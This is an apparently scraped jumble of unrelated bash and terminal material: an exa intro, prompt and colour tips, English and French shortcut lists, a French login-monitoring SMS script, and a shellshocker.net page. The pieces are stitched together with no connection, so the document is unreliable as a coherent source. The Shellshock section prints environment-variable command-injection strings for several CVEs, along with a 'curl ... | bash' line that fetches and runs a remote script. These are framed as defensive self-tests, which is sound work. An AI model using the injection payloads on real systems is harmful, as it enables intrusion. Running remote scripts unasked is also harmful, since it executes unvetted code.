Introduction
exa is a modern replacement for the command-line program ls that ships with Unix and Linux operating systems. This command is used by terminal users, administrators, and developers hundreds of times daily, as well as being useful when writing automated scripts.
Unfortunately, these two uses are at odds with each other. While users want new features and customisation, administrators would prefer the stability of a long-lived and ubiquitous tool.
By deliberately making some decisions differently, exa attempts to be a more featureful, more user-friendly version of ls.
Bash prompt generator
user@hostname ~/path/to/directory $
↑
export PS1="[$(tput setaf 226)]\u[$(tput setaf 220)]@[$(tput setaf 214)]\h [$(tput setaf 33)]\w [$(tput sgr0)]$ "
Welcome
Welcome to the learnshell.org interactive Shell Programming tutorial.
Whether you are an experienced programmer or not, this website is intended for everyone who wishes to learn programming with Unix/Linux shell interpreters.
You are welcome to join our group on Facebook for questions, discussions and updates.
Just click on the chapter you wish to begin from, and follow the instructions. Good luck!
#
Installation
#
Homebrew
If you use macOS and Homebrew, you can install ijq with
brew install gpanders/tap/ijq
#
Download a release
Select the version you want to download from sourcehut and download one of the precompiled releases from that page. Then extract the archive and copy the binary and, optionally, the man page to the correct location.
Example:
wget https://git.sr.ht/~gpanders/ijq/refs/v0.2.3/ijq-v0.2.3-linux-x86_64.tar.gz
tar xf ijq-v0.2.3-linux-x86_64.tar.gz
cd ijq-v0.2.3
cp ijq /usr/local/bin
mkdir -p /usr/local/share/man/man1
cp ijq.1 /usr/local/share/man/man1
Bash error
Defensive BASH Programming
Nov 14th, 2012 | Comments
Here is my Katas for creating BASH programs that work. Nothing is new here, but from my experience pepole like to abuse BASH, forget computer science and create a Big ball of mud from their programs.
Here I provide methods to defend your programs from braking, and keep the code tidy and clean.
Immutable global variables
Try to keep globals to minimum
UPPER_CASE naming
readonly decleration
Use globals to replace cryptic $0, $1, etc.
Globals I allways use in my programs:
Use Bash Strict Mode (Unless You Love Debugging)
Let's start with the punchline. Your bash scripts will be more robust, reliable and maintainable if you start them like this:
#!/bin/bash
set -euo pipefail
IFS=$'\n\t'
The Bash Hackers Wiki
Bash tips: Colors and formatting (ANSI/VT100 Control sequences)
The ANSI/VT100 terminals and terminal emulators are not just able to display black and white text ; they can display colors and formatted texts thanks to escape sequences.
Those sequences are composed of the Escape character (often represented by “^[” or “<Esc>”) followed by some other characters: “<Esc>[FormatCodem”.
In Bash, the <Esc> character can be obtained with the following syntaxes:
\e
\033
\x1B
Examples:
Code (Bash) Preview
echo -e "\e[31mHello World\e[0m"
Hello World
echo -e "\033[31mHello\e[0m World"
Hello World
NOTE¹: The -e option of the echo command enable the parsing of the escape sequences.
NOTE²: The “\e[0m” sequence removes all attributes (formatting and colors). It can be a good idea to add it at the end of each colored text. ;)
NOTE³: The examples in this page are in Bash but the ANSI/VT100 escape sequences can be used in every programming languages.
MOTDs32
MOTD Fork with some customisation and additional stats. 2017
1. Controlling processes
2. While typing commands
3. Correcting text
4. Moving
5. Cut / paste
6. Controlling the terminal
7. Bonus
In Bash and ZSH default key shortcuts are emacs style, a vim style exists.
20 raccourcis clavier du shell (Bash, ZSh) en mode emacs le réglage par défaut. Un mode vim existe.
Keys Description
CTRL+C Close the process running in foreground
CTRL+Z Suspend current process, it goes Zzz
bg command to resume it in background,
fg command to resume it in foreground.
Keys Description
CTRL+R Recall a previous command
TAB Auto-complete files and folder names, also commands and options with ZSH
CTRL+C Clean the line
Keys Description
CTRL+_ Undo the last key press. Can be repeated.
CTRL+T Toggle the last 2 characters;
Alt+T the last 2 words;
Esc+T current word with previous
Keys Description
CTRL+A Go to the begining of the line (like Home) alpha
CTRL+E Go to the end of the line (like End)
Alt+F Move 1 word forward, CTRL+F 1 character
Alt+B Move 1 word backward, CTRL+B 1 character
Keys Description
CTRL+H Cut 1 char before the cursor (like Backspace)
CTRL+W Cut 1 word before the cursor
CTRL+U Cut the part of the line before the cursor (Undo)
CTRL+K Cut the part of the line after the cursor
CTRL+Y Paste (yank) the last cut string
Keys Description
CTRL+S Stop the current output (to read it)
CTRL+Q Quit suspended mode, so resume output.
PgUp to read the begining
<cmd> | less to control output from start.
CTRL+L Clear shell screen, like clear command. Redraw layout
CTRL+D Exit (destroy) the current shell
Keys Description
CTRL+M Alternative to Enter
CTRL+J also works
1. CTRL + A Esc ↑ in a screen, Esc to stop
2. Redraw screen in many console-based app.
Déplacement
Ctrl + A : aller au début de la ligne
Ctrl + E : aller à la fin de la ligne (End)
Ctrl + F : aller un caractère en avant (Forward)
Ctrl + B : aller un caractère en arrière (Backward)
Alt + B : aller un mot en arrière (Backward)
Alt + F : aller un mot en avant (Forward)
Ctrl + XX : aller et revenir entre le début de la ligne et la position actuelle du curseur
Ctrl + L : vider le terminal
Historique
Ctrl + P : afficher la commande précédente dans l’historique (Previous)
Ctrl + N : afficher la commande suivante dans l’historique (Next)
Alt + < : aller au début de l’historique
Alt + > : aller à la fin de l’historique
Ctrl + R : rechercher une commande (Reverse)
ensuite il suffit de commencer à écrire les caractères de la commande en question
Ctrl + R : remonter dans l’historique de recherche
Ctrl + S : redescendre dans l’historique de recherche, si ce n’est pas déjà utilisé par le contrôle de flux, ce qui est généralement le cas (Search)
Ctrl + G : quitter la recherche sans rien exécuter
Alt + R : annuler les changements en cours dans une commande de l’historique (Revert)
Ctrl + Alt + Y : insérer le premier argument de la commande précédente (Yanking)
Alt + . ou Alt + _ : insérer la dernière chaîne de caractères de la commande précédente
répéter la commande pour remonter dans l’historique
Modification
Ctrl + U : supprimer avant le curseur jusqu’au début de la ligne
Ctrl + K : supprimer depuis le curseur jusqu’à la fin de la ligne (Killing)
Ctrl + W : supprimer avant le curseur jusqu’au début de la chaîne
Alt + D : supprimer depuis le curseur jusqu’à la fin de la chaîne
Ctrl + Y : restaurer ce qui a été supprimé avec l’une des combinaisons (Yanking)
Alt + Y : remonter de l’historique du « kill ring » et ainsi restaurer d’anciennes suppressions
Ctrl + D : supprimer le caractère sous le curseur, comme Suppr
Ctrl + H : supprimer le caractère avant le curseur, comme Retour
Ctrl + J ou Ctrl + M : valide la commande, comme Entrée
Alt + U : mettre en majuscule depuis le curseur jusqu’à la fin de la chaîne (Uppercase)
Alt + L : mettre en minuscule depuis le curseur jusqu’à la fin de la chaîne (Lowercase)
Alt + C : mettre en majuscule le caractère sous le curseur (Capitalize)
Alt + T : inverser les deux chaînes avant le curseur (Transpose)
Ctrl + T : inverser les deux derniers caractères depuis le curseur (Transpose)
Alt + # : insérer un # au début de la ligne et valider
ça revient à insérer un commentaire dans l’historique de bash
Ctrl + V : fait que le prochain caractère tapé est inséré en « Verbatim »
faites Ctrl + V et appuyer Entrée en suite pour voir ce que ça fait concrètement, ça peut servir pour insérer une tabulation par exemple
Ctrl + Insert ou Ctrl + Shift + C : copier
Shift + Insert ou Ctrl + Shift + V : coller
l’avantage de la combinaison avec Insert c’est qu’elle fonctionne partout
Complétion
Tab : compléter l’élément (commande, chemin, arguments) sous le curseur
Alt + ? : afficher les complétions possibles
Alt + * : insérer toutes les complétions possibles
Ctrl + X ( : commencer l’enregistrement d’une macro
Ctrl + X ) : terminer l’enregistrement d’une macro
Ctrl + X E : exécuter la macro précédemment enregistrée
Divers
Ctrl + C : arrêter la commande en cours
Ctrl + Z : suspendre le programme en cours
il faut saisir la commande fg (foreground) pour reprendre le programme
Shift + PgUp : faire défiler vers le haut une « page »
Shift + PgDn : faire défiler vers le bas une « page »
Ctrl + Shift + Haut : faire défiler vers le haut une ligne
Ctrl + Shift + Bas : faire défiler vers le bas une ligne
Pour en savoir plus
man -P 'less -p ^READLINE' bash
man -P 'less -p ^EDITING' readline
access.log apache bash script
Testing Bash applications
Je me sers de ce script pour "fliquer" un peu l'utilisation de ma machine personnelle qui est sous Linux. Je reçois donc un SMS quand l'un des événements suivants se produit:
C'est assez simple: On surveille le fichier ''/var/log/auth.log'' et quand certains événements sont détectés, on appelle l'API SMS FreeMobile.
Je met le script suivant dans ''/opt/scripts/logs-sms.sh'' (sans oublier de faire mon chmod):
logs-sms.sh
#!/bin/bash
# Surveillance des logs, et envoi d'un SMS quand un utilisateur se connecte ou déconnecte.
logger "SMS: Démarrage script SMS connexions."
envoie_sms () {
chaine="Asus: `date +%Y-%m-%d_%Hh%M` $*"
logger "SMS: $chaine"
curl -G -d user=UTILISATEUR -d pass=MOTDEPASSE --data-urlencode msg="$chaine" 'https://smsapi.free-mobile.fr/sendmsg'
}
# Expressions régulières pour détecter certains évènements (ouverture session, fermeture session, mauvais mot de passe)
reg_open="pam_unix.*session opened for user (utilisateur1|utilisateur2|utilisateur3|utilisateur4)"
reg_close="pam_unix.*session closed for user (utilisateur1|utilisateur2|utilisateur3|utilisateur4)"
reg_failure="pam_unix.*authentication failure.*user=(.+)"
tail -fn0 /var/log/auth.log | \
while read line ; do
if [[ $line =~ $reg_open ]] ; then
envoie_sms "Ouverture session ${BASH_REMATCH[1]}"
fi
if [[ $line =~ $reg_close ]] ; then
envoie_sms "Fermeture session ${BASH_REMATCH[1]}"
fi
if [[ $line =~ $reg_failure ]] ; then
envoie_sms "Mauvais mot de passe utilisateur ${BASH_REMATCH[1]}"
fi
done
Puis j'ai ajouté la ligne suivante avant le ''exit 0'' dans ''/etc/rc.local'' afin que ça démarre en même temps que la machine.
nohup /bin/bash /opt/scripts/logs-sms.sh > /dev/null 2>&1 &
Notes:
The Bash Hackers Wiki
This wiki is intended to hold documentation of any kind about GNU Bash. The main motivation was to provide human-readable documentation and information so users aren't forced to read every bit of the Bash manpage - which can be difficult to understand. However, the docs here are not meant as a newbie tutorial.
This wiki and any programs found in this wiki are free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This wiki and its programs are distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/.
What would YOU like to see here? (outdated and locked, please use the discussions)
Stranger! Feel free to register and comment or edit the contents. There is a Bash Hackers Wiki needs love page that lists some things to do. The registration is only there to prevent SPAM.
Let's make magic
Good article link:
Go See it on GitHub
https:// clone URL it to Desktop:
git clone https://github.com/bashawesome/bashunixshell-awesome.git
SSH clone URL it to Desktop:
git clone git@github.com:bashawesome/bashunixshell-awesome.git
Version WEB :
borg "get my ip"
wget (link) github.com/ok-borg/borg/releases/download/v0.0.1/borg_linux_amd64 -O /usr/local/bin/borg
chmod 755 /usr/local/bin/borg
codebashing
checkinstall debian bash script apt
shellshocker
What is #shellshock?
Shellshock (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187) is a vulnerability in GNU's bash shell that gives attackers access to run remote commands on a vulnerable system. If your system has not updated bash in since Tue Sep 30 2014: 1:32PM EST (See patch history), you're most definitely vulnerable and have been since first boot. This security vulnerability affects versions 1.14 (released in 1994) to the most recent version 4.3 according to NVD.
You can use this website to test if your system is vulnerable, and also learn how to patch the vulnerability so you are no longer at risk for attack.
You can test if a system is vulnerable by using the form below. Just provide a http or https url and test away!
Url
Please test responsibly. All tests details are logged. Do not test against websites that you do not have permission to test against. All data is archived in case of abuse.
Here is an example script that is vulnerable. Place this in your /cgi-bin/shockme.cgi and try hitting it with the shock tester.
echo "Content-type: text/html"
echo ""
echo "https://shellshocker.net/"
Last updated Friday September 26th at 4:43PM EST: This website tester will now wait for a valid response before returning the state of the vulnerability. If the server responds with a 500 we assume you're vulnerable and we display the response immediately without waiting. If we get any other response code we will wait 3 seconds for a reply from your server and display if you're vulnerable or not.
Testing Your System
To test your system, you can simply run this one liner below to find if you're vulnerable.
curl https://shellshocker.net/shellshock_test.sh | bash
You can view the source of shellshock_test.sh on GitHub.
If you want to test each exploit individually without running the script above, feel free! They are listed below.
Exploit 1 (CVE-2014-6271)
There are a few different ways to test if your system is vulnerable to shellshock. Try running the following command in a shell.
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If you see "vulnerable" you need to update bash. Otherwise, you should be good to go.
Exploit 2 (CVE-2014-7169)
Even after upgrading bash you may still be vulnerable to this exploit. Try running the following code.
env X='() { (shellshocker.net)=>\' bash -c "echo date"; cat echo; rm ./echo
If the above command outputs the current date (it may also show errors), you are still vulnerable.
Exploit 3 (???)
Here is another variation of the exploit. Please leave a comment below if you know the CVE of this exploit.
env X=' () { }; echo hello' bash -c 'date'
If the above command outputs "hello", you are vulnerable.
Exploit 4 (CVE-2014-7186)
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
echo "CVE-2014-7186 vulnerable, redir_stack"
A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".
Exploit 5 (CVE-2014-7187)
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash ||
echo "CVE-2014-7187 vulnerable, word_lineno"
A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno".
Exploit 6 (CVE-2014-6278)
shellshocker='() { echo You are vulnerable; }' bash -c shellshocker
You shouldn't see "You are vulnerable", if you're patched you will see "bash: shellshocker: command not found"
Exploit 7 (CVE-2014-6277)
bash -c "f() { x() { ;}; x() { ;} <<a; }" 2>/dev/null || echo vulnerable
If the command outputs "vulnerable", you are vulnerable.
If you've tested your system, please leave a comment below. Don't forget to include your bash version and what OS you're running. Type bash --version for bash, and cat /etc/release for your OS.
GNU bash Environment Variable Command Injection (MSF)